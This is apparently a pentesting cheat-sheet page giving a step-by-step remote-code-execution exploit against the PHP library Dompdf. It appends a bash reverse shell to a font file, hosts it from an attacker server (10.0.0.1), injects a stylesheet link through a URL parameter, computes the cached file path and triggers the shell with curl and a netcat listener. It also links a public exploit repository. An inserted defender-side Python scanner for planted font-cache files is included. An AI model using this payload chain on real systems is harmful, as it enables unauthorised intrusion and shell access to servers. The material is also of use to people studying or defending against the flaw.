Dompdf RCE
Last modified: 2023-09-12
Dompdf is an HTML to PDF converter for PHP. It may be vulnerable to remote code execution or SSRF.
Exploitation
1. Create Malicious Font
First off, we need to prepare the malicious .ttf file.
Here we find a .ttf file on our local system, copy it to the current directory, and change the extension from ttf to php because we want to execute a PHP script.
find / -name "*.ttf" 2>/dev/null
cp /path/to/example.ttf ./evil.php
Then add the PHP payload at the end of the file.
...
<?php system("bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'"); ?>
2. Create Malicious CSS
Next we create a malicious CSS file that loads the above "evil.php" as a web font.
@font-face {
font-family: 'evil';
src: url('http://10.0.0.1:8000/evil.php');
font-weight: normal;
font-style: normal;
}
3. Host PHP & CSS
Now we have the two files in the current working directory.
ls
evil.css evil.php
Start a web server to host them.
python3 -m http.server 8000
4. Send Request
On the target website, send a request that injects the HTML below (here via the title parameter).
https://example.com/?pdf&title=<link rel=stylesheet href='http://10.0.0.1:8000/evil.css'>
Dompdf fetches our "evil.php" and caches it at /dompdf/lib/fonts/<font_name>_<font_weight/style>_<md5>.php, where the md5 is calculated from the font URL.
For example, /dompdf/lib/fonts/evil_normal_2cddaeb743b6aeb5638ac0ac93c4c9f6.php.
To get the md5 hash, we can calculate it by the following command.
echo -n http://10.0.0.1:8000/evil.php | md5sum
2cddaeb743b6aeb5638ac0ac93c4c9f6
Alternatively, we can use the Python hashlib module.
python3
>>> import hashlib
>>> hashlib.md5("http://10.0.0.1:8000/evil.php".encode("UTF-8")).hexdigest()
'2cddaeb743b6aeb5638ac0ac93c4c9f6'
5. Execute Malicious PHP via Cached File
Now that we know the cached file path, we can request the cached PHP file, which executes the malicious code.
For the reverse shell, we first need to start a listener on our local machine.
nc -lvnp 4444
Now access the cached PHP file.
curl https://example.com/dompdf/lib/fonts/evil_normal_2cddaeb743b6aeb5638ac0ac93c4c9f6.php
We get a shell in our local terminal.
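As an added defender-side example (not from this page), a Python check that scans Dompdf's lib/fonts cache for entries planted this way: it relies on the <font_name>_<style>_<md5 of URL>.<ext> naming described above and flags entries with a non-font extension, no TrueType/OpenType magic, or a PHP open tag hidden after real font data. The extension allow-list is an assumption and the sample cache is constructed inline.

```python
import hashlib
import os
import re
import tempfile

FONT_EXTENSIONS = {".ttf", ".otf", ".ufm", ".afm"}  # assumed allow-list for lib/fonts
# Magic bytes of TrueType / OpenType / TrueType collection files.
FONT_MAGIC = (b"\x00\x01\x00\x00", b"true", b"OTTO", b"ttcf")
PHP_TAG = re.compile(rb"<\?(php|=)")
CACHE_ENTRY = re.compile(r"_[0-9a-f]{32}\.[^.]+$")  # <family>_<style>_<md5 of URL>.<ext>

def inspect_font_file(path):
    """Return the reasons a cached font file looks planted (empty list if clean)."""
    reasons = []
    ext = os.path.splitext(path)[1].lower()
    with open(path, "rb") as fh:
        data = fh.read()
    if ext not in FONT_EXTENSIONS:
        reasons.append(f"unexpected extension {ext}")
    # .ufm/.afm are text metric files and carry no binary magic.
    if ext not in (".ufm", ".afm") and not data.startswith(FONT_MAGIC):
        reasons.append("no TrueType/OpenType magic")
    # A payload appended to a real font keeps the header intact, so look inside too.
    if PHP_TAG.search(data):
        reasons.append("PHP open tag inside font data")
    return reasons

def scan_font_cache(directory):
    """Map each suspicious remote-font cache entry in directory to its reasons."""
    findings = {}
    for name in sorted(os.listdir(directory)):
        if not CACHE_ENTRY.search(name):
            continue  # bundled fonts such as DejaVuSans.ttf are not cache entries
        reasons = inspect_font_file(os.path.join(directory, name))
        if reasons:
            findings[name] = reasons
    return findings

def build_sample_cache():
    """Constructed sample cache: one clean entry and one font with a PHP tail."""
    directory = tempfile.mkdtemp()
    def cache_name(family, url, ext):
        return f"{family}_normal_{hashlib.md5(url.encode()).hexdigest()}.{ext}"
    clean = cache_name("ok", "http://fonts.example/ok.ttf", "ttf")
    planted = cache_name("evil", "http://10.0.0.1:8000/evil.php", "php")
    with open(os.path.join(directory, clean), "wb") as fh:
        fh.write(b"\x00\x01\x00\x00" + b"\x00" * 64)
    with open(os.path.join(directory, planted), "wb") as fh:
        fh.write(b"\x00\x01\x00\x00" + b"\x00" * 64 + b"<?php echo 'marker'; ?>")
    return directory, clean, planted
```

Point scan_font_cache at the real lib/fonts directory of a deployment to audit it; any hit is a file the web server should never have been able to serve as PHP.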
Exploitation (Automated)
We can also exploit this using the following repository.
git clone https://github.com/positive-security/dompdf-rce.git
cd dompdf-rce/exploit
Modify CSS and PHP depending on your situation. Please see the previous "Exploitation" section for the details of each file.
php -S 0.0.0.0:9001
Then send the request.
https://example.com/?pdf&title=<link rel=stylesheet href='http://10.0.0.1:9001/exploit.css'>